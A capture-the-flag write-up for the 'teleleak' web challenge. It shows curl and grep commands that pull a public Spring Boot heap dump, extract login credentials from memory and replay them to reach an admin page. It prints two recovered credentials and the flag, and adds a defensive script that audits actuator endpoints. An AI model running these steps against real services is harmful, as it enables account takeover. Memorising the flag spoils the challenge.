teleleak

Challenge

Imported from local notes.md.

Solution

Original Notes

teleleak

Challenge Summary

  • Given: Five live TeleLeak instances and a hint to avoid noisy interaction.
  • Goal: Get into an existing account and recover the challenge flag.
  • Constraints: Be gentle with the live targets and avoid broad spraying.

Initial Recon / Triage

  • Observations:
    • All instances used the same Spring Boot login/register flow.
    • Registration was intentionally closed with a hint to access an existing account.
    • /actuator was public on teleleak.umbccd.net and exposed a public heapdump link.
  • File identification:
    • artifacts/login.html, register.html, forgotPassword.html: captured public auth pages.
    • artifacts/heapdump1.hprof: public heap dump from /actuator/heapdump.
    • artifacts/heapdump1_seed_hits.txt and related grep outputs: extracted app routes and credential clues from the heap.
  • Entry points:
    • https://teleleak.umbccd.net/actuator/heapdump
    • https://teleleak.umbccd.net/login
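
The public /actuator index noted above is what advertised the heap dump, so the same response can be audited on your own Spring Boot services. This is an added example, not part of the original notes: the host app.example.test, the sample response, the severity ratings and the function name audit_actuator_index are all assumptions made for illustration.

```python
import json

# Endpoint ids whose exposure leaks memory, configuration or control.
# Severity ratings are this example's own judgement, not a Spring classification.
SENSITIVE = {
    "heapdump": "critical",  # full JVM heap: request bodies, credentials, keys
    "shutdown": "critical",
    "env": "high",
    "configprops": "high",
    "httpexchanges": "high",
    "threaddump": "medium",
    "mappings": "medium",
    "loggers": "medium",
}
RANK = {"critical": 0, "high": 1, "medium": 2}

# Constructed sample of an /actuator discovery response (hypothetical host).
SAMPLE_INDEX = """{"_links": {
  "self": {"href": "https://app.example.test/actuator", "templated": false},
  "health": {"href": "https://app.example.test/actuator/health", "templated": false},
  "health-path": {"href": "https://app.example.test/actuator/health/{*path}", "templated": true},
  "heapdump": {"href": "https://app.example.test/actuator/heapdump", "templated": false},
  "env-toMatch": {"href": "https://app.example.test/actuator/env/{toMatch}", "templated": true},
  "env": {"href": "https://app.example.test/actuator/env", "templated": false}
}}"""


def audit_actuator_index(body):
    """Return sorted (severity, endpoint, href) tuples for sensitive endpoints."""
    try:
        links = json.loads(body).get("_links", {})
    except (ValueError, AttributeError):
        return []  # not an actuator index, e.g. an HTML login redirect
    if not isinstance(links, dict):
        return []
    found = {}
    for name, link in links.items():
        endpoint = name.split("-", 1)[0]  # "env-toMatch" -> "env"
        if endpoint not in SENSITIVE or not isinstance(link, dict):
            continue
        # Keep one entry per endpoint, preferring the non-templated base link.
        if endpoint not in found or not link.get("templated"):
            found[endpoint] = (SENSITIVE[endpoint], endpoint, link.get("href", ""))
    return sorted(found.values(), key=lambda f: (RANK[f[0]], f[1]))


if __name__ == "__main__":
    for severity, endpoint, href in audit_actuator_index(SAMPLE_INDEX):
        print(f"{severity:8} {endpoint:10} {href}")
```

In Spring Boot, web exposure is controlled by management.endpoints.web.exposure.include; keeping heapdump out of that list, or requiring authentication for /actuator/**, clears the critical finding.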

Hypotheses & Approach

  • Hypothesis 1: The intended bug is not login-form injection, but sensitive memory disclosure through the exposed heap dump.
  • Hypothesis 2: The heap contains recent request bodies and/or seeded user credentials that can be replayed directly against the login form.

Execution Steps (Reproducible)

Stage 1

Commands:

curl -s https://teleleak.umbccd.net/actuator
curl -s https://teleleak.umbccd.net/actuator/heapdump -o artifacts/heapdump1.hprof
strings -a artifacts/heapdump1.hprof | rg "username=|password=|seedAdmin|/admin/dashboard|/u/"

Results:

  • Confirmed public actuator access and downloaded the live heap dump.
  • Extracted multiple credential-looking request fragments from memory, including:
    • username=weiner&password=026ad9b14a7453b7488daa0c6acbc258b1506f52c441c7c465474c1a564394ff
    • username=admin&password=f374e70b2d71eb7188c0eda0b6a13d47ca5abd681118de48354f003d8af534f5
  • Extracted app routes including /admin/dashboard and /u/{username}.

Stage 2

Commands:

python3 artifacts/test_logins.py
python3 artifacts/fetch_admin.py

Results:

  • Verified weiner login succeeded and redirected to /u/weiner.
  • Verified admin login with hash f374e70b2d71eb7188c0eda0b6a13d47ca5abd681118de48354f003d8af534f5 succeeded and redirected to /admin/dashboard.
  • Fetching /admin/dashboard returned the flag directly.

Artifacts Produced

  • artifacts/heapdump1.hprof
  • artifacts/test_logins.py
  • artifacts/fetch_admin.py
  • artifacts/admin_fetch/admin__dashboard.txt

Flag

Dawgctf{w3b_m3m_Dumpz!}